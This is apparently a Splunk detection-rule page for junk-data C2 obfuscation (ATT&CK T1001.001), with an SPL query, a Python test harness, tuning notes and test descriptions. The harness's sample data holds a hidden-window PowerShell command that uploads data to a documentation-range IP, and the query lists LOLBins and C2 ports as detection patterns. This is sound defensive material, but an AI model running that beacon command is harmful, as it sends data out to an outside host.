Detect Junk Data in Splunk
Adversaries may add junk data to the protocols used for command and control to make detection more difficult. By appending, prepending, or inserting random or meaningless data into C2 communications, adversaries defeat trivial signature-based detection. Examples include SUNBURST appending junk bytes to HTTP C2, P2P ZeuS adding junk data to UDP peer communications, Downdelph inserting pseudo-random characters between meaningful characters in C2 requests, and GoldMax generating decoy traffic to surround malicious traffic. The padding itself is only visible on the wire, so host-based telemetry such as Sysmon cannot see it directly; what it can surface are the side effects, namely repeated outbound connections from an unexpected process and DNS queries whose labels carry encoded or padded content.
MITRE ATT&CK
- Tactic
- Command and Control
- Technique
- T1001 Data Obfuscation
- Sub-technique
- T1001.001 Junk Data
- Canonical reference
- https://attack.mitre.org/techniques/T1001/001/
SPL Detection Query
| union
[
search index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=3 Initiated="true"
| eval process_name=lower(mvindex(split(Image, "\\"), -1))
| eval is_suspicious_proc=if(match(process_name, "(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32|svchost|dllhost)"), 1, 0)
| where is_suspicious_proc=1
| eval is_public_ip=if(NOT match(DestinationIp, "^(10\\.|172\\.(1[6-9]|2[0-9]|3[01])\\.|192\\.168\\.|127\\.|0\\.|::1|fe80)"), 1, 0)
| where is_public_ip=1
| eval is_c2_port=if(DestinationPort IN ("80", "443", "8080", "8443", "4444", "4445", "1080", "3128"), 1, 0)
| stats count as ConnectionCount, dc(DestinationIp) as UniqueIPs, values(DestinationIp) as RemoteIPs, values(DestinationPort) as Ports, earliest(_time) as FirstSeen, latest(_time) as LastSeen by host, Image, CommandLine, is_c2_port
| where ConnectionCount >= 5
| eval detection_type="beaconing_candidate", _time=LastSeen
| table _time, host, Image, CommandLine, ConnectionCount, UniqueIPs, RemoteIPs, Ports, is_c2_port, detection_type, FirstSeen, LastSeen
]
[
search index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=22
| eval query_lower=lower(QueryName)
| eval label_count=mvcount(split(query_lower, "."))
| eval first_label=mvindex(split(query_lower, "."), 0)
| eval first_label_len=len(first_label)
| eval has_hex_chars=if(match(first_label, "^[0-9a-f]{16,}$"), 1, 0)
| eval has_random_chars=if(match(first_label, "[bcdfghjklmnpqrstvwxyz]{5,}"), 1, 0)
| eval is_suspicious_dns=if(first_label_len > 20 OR label_count > 6 OR has_hex_chars=1, 1, 0)
| where is_suspicious_dns=1
| stats count as QueryCount, dc(QueryName) as UniqueDomains, values(QueryName) as SampleDomains, max(first_label_len) as MaxLabelLen, max(label_count) as MaxLabelCount, sum(has_random_chars) as RandomLabelHits, earliest(_time) as FirstSeen, latest(_time) as LastSeen by host, Image
| where QueryCount >= 3 OR UniqueDomains >= 3
| eval detection_type="suspicious_dns_junk_label", _time=LastSeen
| table _time, host, Image, QueryCount, UniqueDomains, SampleDomains, MaxLabelLen, MaxLabelCount, RandomLabelHits, detection_type, FirstSeen, LastSeen
]
| eval alert_score=case(
detection_type="beaconing_candidate" AND ConnectionCount > 50, 3,
detection_type="beaconing_candidate" AND ConnectionCount > 20, 2,
detection_type="suspicious_dns_junk_label" AND UniqueDomains > 10, 3,
detection_type="suspicious_dns_junk_label", 2,
true(), 1
)
| sort - alert_score, - _time
Detects potential junk data C2 obfuscation using two Sysmon data sources: (1) Event ID 3 (Network Connection), restricted to connections the local process initiated (Initiated="true"), to identify high-frequency beaconing from suspicious processes to public IPs, with is_c2_port flagging rows on commonly abused ports; and (2) Event ID 22 (DNS Query) to detect unusually long first labels, deep subdomain hierarchies, or long hexadecimal labels indicative of junk data embedded in DNS-based C2. The DNS branch aggregates per host and process rather than per query name, so UniqueDomains counts the distinct names a single process resolved; has_random_chars (a run of five or more consonants) is carried through as RandomLabelHits for triage rather than used as a trigger, since it is noisy on its own. Because stats discards _time, each branch sets _time to LastSeen so the final sort is meaningful. Results are scored on frequency and anomaly severity. Requires Sysmon with network connection (Event ID 3) and DNS query (Event ID 22) logging enabled in the Sysmon configuration.
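To check the heuristics before shipping the search, the following is an added Python re-implementation of the two branches and the scoring block above, run over constructed Sysmon events; it is not part of the original detection package. It deliberately reuses the SPL's regexes and thresholds so that a change validated here maps directly onto the search. Field names (host, Image, CommandLine, DestinationIp, DestinationPort, Initiated, QueryName), the host name WS01, the image paths and the IP addresses are assumed sample values; the 203.0.113.0/24 and 198.51.100.0/24 ranges are documentation ranges and c2sim.local is the domain the tests further down use.

```python
import re
from collections import defaultdict

# Same regexes and thresholds as the SPL, so a change validated here maps 1:1 to the search.
SUSPICIOUS_PROC = re.compile(r"(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32|svchost|dllhost)")
NON_PUBLIC_IP = re.compile(r"^(10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.|127\.|0\.|::1|fe80)")
C2_PORTS = {80, 443, 8080, 8443, 4444, 4445, 1080, 3128}
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")
CONSONANT_RUN = re.compile(r"[bcdfghjklmnpqrstvwxyz]{5,}")


def process_name(image):
    """lower(mvindex(split(Image, "\\"), -1)): the file name of the image path."""
    return image.rsplit("\\", 1)[-1].lower()


def is_public_ip(ip):
    """True unless the address is RFC 1918, loopback, 0.0.0.0/8, ::1 or an fe80 prefix."""
    return NON_PUBLIC_IP.match(ip) is None


def dns_features(query_name):
    labels = query_name.lower().split(".")
    return {"label_count": len(labels), "first_label_len": len(labels[0]),
            "has_hex_chars": HEX_LABEL.match(labels[0]) is not None,
            "has_random_chars": CONSONANT_RUN.search(labels[0]) is not None}


def is_suspicious_dns(query_name):
    f = dns_features(query_name)
    return f["first_label_len"] > 20 or f["label_count"] > 6 or f["has_hex_chars"]


def beaconing_candidates(events, min_connections=5):
    """EID 3 branch: outbound connections from a listed process to a public IP,
    aggregated per (host, Image, CommandLine) like the SPL stats clause."""
    groups = defaultdict(lambda: {"count": 0, "ips": set(), "ports": set(), "c2": 0})
    for e in events:
        if e["EventCode"] != 3 or str(e.get("Initiated", "true")).lower() != "true":
            continue  # inbound connections are not beacons
        if not SUSPICIOUS_PROC.search(process_name(e["Image"])) or not is_public_ip(e["DestinationIp"]):
            continue
        g = groups[(e["host"], e["Image"], e["CommandLine"])]
        g["count"] += 1
        g["ips"].add(e["DestinationIp"])
        g["ports"].add(int(e["DestinationPort"]))
        g["c2"] += int(int(e["DestinationPort"]) in C2_PORTS)
    return [{"detection_type": "beaconing_candidate", "host": h, "Image": img, "CommandLine": cmd,
             "ConnectionCount": g["count"], "UniqueIPs": len(g["ips"]), "Ports": sorted(g["ports"]),
             "C2PortHits": g["c2"]}
            for (h, img, cmd), g in groups.items() if g["count"] >= min_connections]


def dns_junk_candidates(events):
    """EID 22 branch: queries with a junk-looking first label, aggregated per (host, Image)."""
    groups = defaultdict(lambda: {"count": 0, "names": set()})
    for e in events:
        if e["EventCode"] == 22 and is_suspicious_dns(e["QueryName"]):
            g = groups[(e["host"], e["Image"])]
            g["count"] += 1
            g["names"].add(e["QueryName"])
    return [{"detection_type": "suspicious_dns_junk_label", "host": h, "Image": img,
             "QueryCount": g["count"], "UniqueDomains": len(g["names"]), "SampleDomains": sorted(g["names"])}
            for (h, img), g in groups.items() if g["count"] >= 3 or len(g["names"]) >= 3]


def alert_score(f):
    """The case() block at the end of the SPL."""
    if f["detection_type"] == "beaconing_candidate":
        return 3 if f["ConnectionCount"] > 50 else 2 if f["ConnectionCount"] > 20 else 1
    if f["detection_type"] == "suspicious_dns_junk_label":
        return 3 if f["UniqueDomains"] > 10 else 2
    return 1


def run_detection(events):
    findings = beaconing_candidates(events) + dns_junk_candidates(events)
    for f in findings:
        f["alert_score"] = alert_score(f)
    return sorted(findings, key=lambda f: -f["alert_score"])


def constructed_events():
    """Constructed sample telemetry, not real logs (assumed host, paths and addresses)."""
    ps = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    chrome = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
    beacon = "powershell.exe -nop -w hidden -c (New-Object Net.WebClient).UploadString('http://203.0.113.10/', $junk)"

    def net(img, cmd, ip, port):
        return {"EventCode": 3, "host": "WS01", "Image": img, "CommandLine": cmd,
                "Initiated": "true", "DestinationIp": ip, "DestinationPort": port}

    ev = [net(ps, beacon, "203.0.113.10", 443) for _ in range(25)]      # the beacon
    ev += [net(ps, beacon, "127.0.0.1", 8080) for _ in range(3)]        # loopback, as in Test 1: filtered out
    ev += [net(chrome, chrome, "198.51.100.7", 443) for _ in range(6)]  # browser: not a listed process
    for label in ("0123456789abcdef01234567", "fedcba9876543210fedcba98",
                  "00ff00ff00ff00ff00ff00ff", "deadbeefdeadbeefdeadbeef"):
        ev.append({"EventCode": 22, "host": "WS01", "Image": ps, "QueryName": label + ".c2sim.local"})
    ev.append({"EventCode": 22, "host": "WS01", "Image": chrome, "QueryName": "www.example.com"})
    return ev


if __name__ == "__main__":
    for f in run_detection(constructed_events()):
        print(f["alert_score"], f["detection_type"], f["host"], f.get("ConnectionCount", f.get("QueryCount")))
```

Running the script yields one beaconing candidate (25 connections, score 2) and one DNS finding (4 hex-labelled queries under c2sim.local, score 2); the loopback connections and the browser traffic produce nothing, which is exactly what the public-IP and process-name filters in the SPL are meant to do. Swapping the constructed events for a few hundred lines exported from your own index is the quickest way to see what the label-length and label-count thresholds catch in a real environment before tuning them.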
Data Sources
- Sysmon Event ID 3 (Network Connection): host, Image, CommandLine, DestinationIp, DestinationPort, Initiated
- Sysmon Event ID 22 (DNS Query): host, Image, QueryName
Required Sourcetypes
- XmlWinEventLog:Microsoft-Windows-Sysmon/Operational (the query assumes index=wineventlog; adjust the index to your environment)
False Positives & Tuning
- Legitimate software telemetry agents making frequent connections to cloud backends from script hosts or service processes
- DNS-based CDN routing using long subdomains (AWS CloudFront, Azure Traffic Manager, Akamai)
- Antivirus or EDR solutions performing frequent cloud lookups with long hash-based subdomain queries
- Chat/collaboration applications (Teams, Slack) that use long subdomains for routing or session management
- Software update services performing frequent version checks on standard HTTP/HTTPS ports
- Tuning: maintain a lookup of known-good destination IPs and DNS suffixes (CDN, EDR and collaboration vendors) and exclude it before the stats clauses; after a baseline period, raise the ConnectionCount and QueryCount thresholds to match the environment's normal volume
Testing Methodology
Validate this detection with the four Atomic Red Team style tests below. Each test lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro. Note that Tests 1 and 4 beacon to 127.0.0.1, which the query's public-IP filter drops, so to exercise the beaconing branch point the simulator at a non-RFC 1918 lab address or temporarily relax the is_public_ip condition; Test 3 produces only a file-creation event (Event ID 11) that this query does not consume, so it validates telemetry collection rather than the detection logic itself.
- Test 1: HTTP C2 Simulation with Junk Data Padding
Expected signal: Sysmon Event ID 1: PowerShell process creation with command line containing 'Net.WebClient' and 'UploadString'. Sysmon Event ID 3: Multiple network connection attempts to 127.0.0.1:8080. Security Event ID 4688 (if command line auditing is enabled). PowerShell ScriptBlock Log Event ID 4104 showing the full beaconing script.
- Test 2: DNS-Based C2 with Junk Subdomain Labels
Expected signal: Sysmon Event ID 22 (DNS Query): Multiple DNS lookup events with QueryName values containing long, random-looking subdomain labels (more than 20 characters) under c2sim.local. The labels will contain Base64-encoded content with interleaved junk characters. Sysmon Event ID 1 for the PowerShell process creation.
- Test 3: Junk Data File Padding Simulation
Expected signal: Sysmon Event ID 11 (File Create): File creation event for junktest_sim.dll in %TEMP% with a large file size (about 50 MB). Sysmon Event ID 1 for the PowerShell process. The file hash (SHA-256) will be recorded in the Sysmon event.
- Test 4: Periodic Beaconing with Junk UDP Padding
Expected signal: Sysmon Event ID 3 (Network Connection): UDP connections from powershell.exe to 127.0.0.1:4444 (Sysmon captures UDP connections only if the configuration's NetworkConnect rules include them). Sysmon Event ID 1 for process creation. Security Event ID 4688 if command line auditing is enabled.
References (15)
- https://attack.mitre.org/techniques/T1001/001/
- https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
- https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- https://www.secureworks.com/research/p2p-zeus
- https://www.welivesecurity.com/2016/10/20/anatomy-of-attack-celebrity-malware-downdelph/
- https://www.cisa.gov/sites/default/files/publications/AA22-055A-MuddyWater.pdf
- https://unit42.paloaltonetworks.com/bendybear/
- https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/
- https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RUSSIAN_INTELLIGENCE_BOT_SNAKE.PDF
- https://securelist.com/apt10-sophisticated-multi-layered-loader-romabt/101971/
- https://blog.trendmicro.com/trendlabs-security-intelligence/blacktech-espionage-tools-target-east-asia/
- https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
- https://www.kaspersky.com/about/press-releases/2021_apt-trends-report-q3-2021
- https://www.microsoft.com/en-us/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
- https://www.welivesecurity.com/2025/02/12/evasive-zipline-group-targets-job-seekers/